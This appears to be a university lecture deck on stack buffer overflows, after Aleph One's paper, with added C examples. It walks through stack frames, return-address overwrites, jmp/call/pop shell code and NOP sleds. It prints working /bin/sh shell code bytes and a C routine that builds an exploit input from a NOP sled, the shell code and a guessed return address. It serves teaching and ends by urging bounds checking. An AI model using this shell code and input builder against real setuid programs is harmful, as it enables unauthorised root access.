Description: An introduction to how buffer overflows work. Reference: Smashing The Stack For Fun And Profit (by Aleph One). 逢甲大學資工所 平行實驗室 鍾宜勳 (Feng Chia University, Graduate Institute of Information Engineering, Parallel Lab, 鍾宜勳). PowerPoint presentation; the first nine slides walk through how the stack works (1/9 to 9/9).
Buffer Overflow: Smashing The Stack For Fun And Profit (by Aleph One)
How the stack works (1/9) to (9/9)

The nine slides step through one C listing and draw the stack after each statement. The listing:

    Main( )
    {
        int x ;
        x = 0 ;
        Function( 1 , 2 , 3 );
        x = 1 ;
        printf("%d", x );
    }

    Function( )
    {
        char buffer1[5];     /* slides 4/9 onward draw it as buffer1[2] so the figure fits */
        return ;
    }

Stack contents while Function() is running (high addresses at the top; the stack grows downward):

    x = 0             Main()'s local variable
    3
    2                 the arguments, pushed right to left
    1
    Return address    where Function() will return to inside Main()
    SFP               saved frame pointer of Main()'s frame
    buffer1[1]
    buffer1[0]        Function()'s local array, at the lowest address

The sequence the slides animate:
1/9  Main() starts; space for x is reserved on the stack.
2/9  x = 0 is stored.
3/9  Function(1, 2, 3) is called: the arguments are pushed (3, 2, 1), then the return address, then the SFP.
4/9 to 6/9  Function() reserves buffer1 below the SFP and runs up to its return.
7/9  return pops Function()'s frame; Main()'s x is still 0.
8/9  x = 1 is stored.
9/9  printf prints 1.
Stack versus array growth

The stack grows from high addresses toward low addresses; an array is written from low addresses toward high addresses. buffer1 therefore lies below the SFP and the return address, and writing more into the array than it holds (a buffer overflow) runs upward, first over the SFP and then over the return address:

    3
    2
    1
    Return address    <- buffer1[3] lands here
    SFP               <- buffer1[2] lands here
    buffer1[1]
    buffer1[0]

(The figure draws the SFP and the return address as one slot each; on a 32-bit machine each is four bytes, so a real overflow needs correspondingly more bytes to reach them.)

Once the overflow has changed the return address, Function()'s return no longer goes back to Main(): the CPU continues at whatever value now sits in the return address slot. The slide marks the return with "?" and asks where execution goes.

    Main( )
    {
        int x ;
        x = 0 ;
        Function( 1 , 2 , 3 );
        x = 1 ;
        printf("%d", x );
    }

    Function( )
    {
        char buffer1[5];
        return ;            /* ? */
    }
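To make the overwrite order concrete, here is an added example (mine, not from the slides or from Aleph One's paper) that models the 32-bit frame drawn above as a C struct and copies oversized input into buffer1 the way an unchecked strcpy() would. The struct layout, the sample SFP and return-address values and the "AAAA…" inputs are constructed for the demonstration; a real frame differs by compiler padding and by the buffer's actual size.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of the 32-bit frame on the slides, laid out from low to high
 * addresses: buffer1 lowest, then the saved frame pointer (SFP), then the
 * return address, then the arguments 1, 2, 3.  Real frames also contain
 * padding and compiler temporaries; this keeps the slide's order so the
 * effect of writing past buffer1 is easy to see.
 */
struct frame {
    char     buffer1[8];     /* the local array (slide: buffer1[5], rounded up for alignment) */
    uint32_t sfp;            /* saved frame pointer of the caller */
    uint32_t ret;            /* return address into Main() */
    uint32_t arg1, arg2, arg3;
};

/* Constructed sample values, chosen only so that corruption is visible. */
#define SAMPLE_SFP 0xbffff8f0u
#define SAMPLE_RET 0x080484a0u

/*
 * Copy `len` bytes of `input` into buffer1 byte by byte with no bounds
 * check, continuing into whatever lies above the buffer, as strcpy() does
 * (strcpy would also drop a terminating NUL one byte further on).
 * Returns the number of bytes written past the end of buffer1 (0 = no
 * overflow) and leaves the resulting frame in *out.  Writes are clipped at
 * the end of the struct so the model cannot corrupt this program's own stack.
 */
size_t overflow_frame(const unsigned char *input, size_t len, struct frame *out)
{
    struct frame fr = { {0}, SAMPLE_SFP, SAMPLE_RET, 1, 2, 3 };
    unsigned char *raw = (unsigned char *)&fr;    /* byte view of the frame, low to high */
    size_t start = offsetof(struct frame, buffer1);
    size_t room  = sizeof fr - start;

    if (len > room)
        len = room;                               /* clip: the model ends at arg3 */
    memcpy(raw + start, input, len);

    *out = fr;
    return len > sizeof fr.buffer1 ? len - sizeof fr.buffer1 : 0;
}

/* Which slot did the overflow reach?  As on the slide: SFP first, then the return address. */
const char *corrupted_slot(const struct frame *fr)
{
    if (fr->ret != SAMPLE_RET) return "return address";
    if (fr->sfp != SAMPLE_SFP) return "SFP";
    return "none";
}

int main(void)
{
    /* Constructed inputs: 'A' fills the buffer, 'B' lands on the SFP, 'C' on the return address. */
    const char *cases[] = { "AAAAAAA", "AAAAAAAABBBB", "AAAAAAAABBBBCCCC" };
    struct frame fr;

    for (size_t i = 0; i < 3; i++) {
        size_t over = overflow_frame((const unsigned char *)cases[i], strlen(cases[i]), &fr);
        printf("%-18s past buffer1: %zu  sfp=0x%08x ret=0x%08x  corrupted: %s\n",
               cases[i], over, fr.sfp, fr.ret, corrupted_slot(&fr));
    }
    return 0;
}
```

Twelve bytes are enough to replace the SFP and sixteen to replace the return address in this model; with the slide's buffer1[5] the distances are shorter, and with a real compiler they depend on how the frame was laid out, which is exactly why the later slides have to guess.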
Idea 1. Overwrite the return address

Use the buffer overflow to change the return address, place code on the stack, and make the return address point to that code. When Function() returns, it jumps to the stack code instead of back into Main(). The slide's stack code:

    movl $0x8,%ebx
    movl $0x1,%eax
    nop
    int $0x80

On Linux/x86, system call number 1 in %eax is exit(), so this sequence ends the process with exit status 8 instead of continuing in Main().

    3
    2
    1
    Return address    -> changed to the address of the stack code
    SFP
    stack code        (in the low-address part of the frame, where buffer1 was)
Idea 2. Root shell

If the overflowed program is setuid root, the code that runs after the overflow runs with root privilege. If that code spawns a shell (again via int $0x80), the attacker ends up with a root shell:

    3
    2
    1
    Return address    -> stack code
    SFP
    stack code ... int $0x80    => shell with root privilege
Idea 3. Put the two together

Use a buffer overflow to get code onto the stack, run it with root privilege, and obtain a root shell. This raises three questions: how does the code get onto the stack, what should the return address be changed to, and how is the overflow triggered? The answer to all three is the same: feed the code to the vulnerable program as its input, for example

    sh-2.04$ ./vulnerable $CODE

The input consists of the shell code followed by the new return address. The unchecked copy places the shell code in buffer1 and the new return address over the real one, so the function returns into the shell code.
Shell code

The code placed on the stack is called shell code, because its job is to start a shell. It has to find the address of its own "/bin/sh" string without knowing where on the stack it was copied. The six shell code slides show the jmp/call/pop trick that solves this:

    jmp  ----------------------+      (1/6) jump forward to the call
    popl %esi  <-----------+   |      (5/6) the pushed address is now in %esi
    ... set up execve( )   |   |      (6/6) arguments for execve( ), then int $0x80
    int $0x80              |   |
    call ------------------+   |      (2/6) pushes the address of the byte after it, jumps back
    "/bin/sh"  <---------------+      the string: its address is what the call pushed

1/6  The shell code begins with a jmp forward to a call placed just in front of the string.
2/6  The call pushes the address of the instruction that follows it, which is the string, onto the stack and jumps backward.
3/6  It lands at the start of the shell code, right after the jmp.
4/6  Execution continues from there.
5/6  A pop takes the pushed address off the stack into a register.
6/6  With the address of "/bin/sh" in a register, the code fills in the arguments for execve( ) and issues int $0x80; the kernel replaces the process with a shell.
Problems (1/3): 0x00 bytes in the shell code
The shell code reaches the target through strcpy(), which stops at the first 0x00 byte (the C string terminator \0). Any 0x00 inside the shell code therefore truncates it and the rest never reaches the stack. Every instruction that encodes a zero byte has to be rewritten: a register is zeroed with xor instead of loaded with 0, a store of the constant 0 becomes a store of the already zeroed register, and a small immediate such as 0xb is loaded into the low byte of the register (movb into %al) so that the zero high bytes of a 32-bit immediate never appear in the code. The slide's example:

    movb $0x0,0x7(%esi)    ->    xorl %eax,%eax
                                 movb %eax,0x7(%esi)
Problems (2/3): the shell code as a C string
Packed into a C string, the shell code is passed to the vulnerable program as its input:

    sh-2.04$ ./vulnerable $CODE

    char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

Note that this is the first version from Aleph One's paper (testsc.c) and it still contains 0x00 bytes (for example \xb8\x0b\x00\x00\x00 is movl $0xb,%eax). It works when executed directly from the array in a test program, but strcpy() would cut it at the first zero; the paper's final shell code applies the rewrites from (1/3) and contains no null bytes.
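As an added example (not code from the slides or from the paper), the following C program checks the two properties these slides care about, on the shell code bytes printed above and on the null-free rewrite from Aleph One's paper: it counts the 0x00 bytes that would stop strcpy(), and it follows the jmp/call/pop chain statically to show where "/bin/sh" sits and that the call really lands on the popl %esi. The function names count_nulls and locate_string are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shell code exactly as printed on the slide (the testsc.c version). */
static const unsigned char sc_slide[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

/* The null-free rewrite from the same paper (xorl %eax,%eax; movb %al,...; movb $0xb,%al; ...). */
static const unsigned char sc_nonull[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define SC_LEN(a) (sizeof (a) - 1)   /* drop the string literal's own terminator */

/* Number of 0x00 bytes: anything other than 0 means strcpy() truncates the code. */
size_t count_nulls(const unsigned char *sc, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (sc[i] == 0x00);
    return n;
}

/*
 * Follow the jmp/call/pop trick without executing anything:
 *   jmp  rel8   (eb xx)           lands on the call
 *   call rel32  (e8 xx xx xx xx)  pushes the offset of the byte after itself ("/bin/sh") and jumps back
 *   popl %esi   (5e)              that pushed address ends up in %esi
 * Returns the offset of the string inside the shell code, or -1 if the bytes do not
 * have this shape; *pop_off receives the offset of the popl the call lands on.
 */
long locate_string(const unsigned char *sc, size_t len, long *pop_off)
{
    if (len < 2 || sc[0] != 0xeb)
        return -1;
    long jmp_target = 2 + (int8_t)sc[1];              /* rel8 is relative to the end of the jmp */
    if (jmp_target < 0 || (size_t)jmp_target + 5 > len || sc[jmp_target] != 0xe8)
        return -1;
    int32_t rel = (int32_t)((uint32_t)sc[jmp_target + 1]
                          | (uint32_t)sc[jmp_target + 2] << 8
                          | (uint32_t)sc[jmp_target + 3] << 16
                          | (uint32_t)sc[jmp_target + 4] << 24);
    long pushed      = jmp_target + 5;                /* what the call pushes: the string's offset */
    long call_target = pushed + rel;                  /* where the call lands: must be popl %esi */
    if (call_target < 0 || (size_t)call_target >= len || sc[call_target] != 0x5e)
        return -1;
    *pop_off = call_target;
    return pushed;
}

int main(void)
{
    const unsigned char *codes[] = { sc_slide, sc_nonull };
    size_t lens[] = { SC_LEN(sc_slide), SC_LEN(sc_nonull) };
    for (int i = 0; i < 2; i++) {
        long pop = -1;
        long str = locate_string(codes[i], lens[i], &pop);
        printf("%zu bytes, %zu null bytes, popl at %ld, string at %ld: %s\n",
               lens[i], count_nulls(codes[i], lens[i]), pop, str,
               str < 0 ? "(unexpected layout)" : (const char *)codes[i] + str);
    }
    return 0;
}
```

The slide's version has 16 zero bytes; the rewrite has none and is 16 bytes shorter, yet both resolve to the same structure: the call lands on the popl at offset 2 and the string is the byte right after the call.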
Problems (3/3): the return address is only a guess
The overflow has to overwrite the return address with the address of the shell code, but the exact stack address at which the input lands is not known, so the return address can only be guessed. To make a guess good enough, the shell code is preceded by a run of nop instructions (a NOP sled): a return address that lands anywhere in the sled executes nops until it reaches the shell code, so the guess need only be approximately right.

    NOP NOP NOP ... NOP | shell code | guessed return address
The complete overflow

The array is overflowed with the whole input: the NOP sled, the shell code, and the guessed return address repeated to the end of the input.

    Array (buffer1)   <- NOP sled, then shell code
    SFP               <- overwritten by a copy of the guessed return address
    Return address    <- overwritten by a copy of the guessed return address

The guessed return address replaces the real return address. When the function returns, execution lands in the NOP sled at the guessed address, slides through the nops into the shell code, and the shell starts. The guess only has to fall somewhere inside the sled.
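The following C example is added here; it is not the slides' code and not the paper's own exploit program, only a rewrite of the layout step of that exploit. It builds the input in the layout just described: the guessed return address repeated across the buffer (starting at an alignment offset of 0 to 3 bytes, since the exact distance to the saved return address is unknown), a NOP sled over the first half, the shell code centred on the midpoint, and a terminating zero. It also checks the result for premature 0x00 bytes, since the input is delivered through strcpy()/setenv(). The guessed address 0xbffff7a0 is a constructed sample; in the paper it is derived from the current stack pointer minus an offset.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90   /* x86 one-byte no-op: the sled */

/* The null-free /bin/sh shell code from Aleph One's paper, used here as sample payload. */
static const unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof shellcode - 1)

/*
 * Lay out the input ("egg") the way the paper's exploit does:
 *
 *   [ NOP sled ........... ][ shell code ][ guessed ret addr, repeated ... ][ \0 ]
 *   0                   bsize/2                                         bsize-1
 *
 * 1. write the guessed address over the whole buffer, 4 bytes at a time,
 *    starting at `align` (0..3), so that one copy lands exactly on the saved
 *    return address whatever the true distance is;
 * 2. turn the first half into a NOP sled;
 * 3. centre the shell code on bsize/2;
 * 4. terminate the string for setenv()/strcpy().
 * Returns the offset at which the shell code was placed, or 0 on bad arguments.
 */
size_t build_egg(unsigned char *buff, size_t bsize, uint32_t ret_addr, int align,
                 const unsigned char *sc, size_t sclen)
{
    if (bsize < 2 * sclen + 8 || align < 0 || align > 3)
        return 0;

    for (size_t i = (size_t)align; i + 4 <= bsize; i += 4) {   /* 1: address fill, little-endian */
        buff[i]     = (unsigned char)(ret_addr);
        buff[i + 1] = (unsigned char)(ret_addr >> 8);
        buff[i + 2] = (unsigned char)(ret_addr >> 16);
        buff[i + 3] = (unsigned char)(ret_addr >> 24);
    }
    memset(buff, NOP, bsize / 2);                               /* 2: NOP sled */
    size_t sc_off = bsize / 2 - sclen / 2;                      /* 3: shell code in the middle */
    memcpy(buff + sc_off, sc, sclen);
    buff[bsize - 1] = '\0';                                     /* 4: terminator */
    return sc_off;
}

/*
 * The egg travels through strcpy()/setenv(), so it must contain no 0x00 byte
 * before the final terminator.  Returns the offset of the first zero byte;
 * anything other than bsize-1 means part of the egg is lost in the copy.
 */
size_t first_null(const unsigned char *buff, size_t bsize)
{
    for (size_t i = 0; i < bsize; i++)
        if (buff[i] == 0)
            return i;
    return bsize;
}

int main(void)
{
    enum { BSIZE = 512 };
    unsigned char egg[BSIZE];
    uint32_t guess = 0xbffff7a0u;   /* constructed sample guess */

    size_t off = build_egg(egg, BSIZE, guess, 0, shellcode, SHELLCODE_LEN);
    printf("sled %zu bytes, shell code at %zu, first null at %zu of %d\n",
           off, off, first_null(egg, BSIZE), BSIZE);

    /* A guess that itself contains a zero byte truncates the egg after the shell code. */
    build_egg(egg, BSIZE, 0xbfff0000u, 0, shellcode, SHELLCODE_LEN);
    printf("with guess 0xbfff0000, first null at %zu\n", first_null(egg, BSIZE));
    return 0;
}
```

The second call shows a constraint the slides' null-byte discussion implies but does not spell out: the guessed return address is copied by the same strcpy(), so it must not contain a 0x00 byte either, or every copy after the first is cut off.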
Conclusion
A buffer overflow lets an attacker become the superuser without knowing the root password. The root cause is that C does no bounds checking on arrays, so any C program that copies input into a fixed-size buffer without checking its length inherits the problem. Check the bounds of every buffer: Bound Checking!!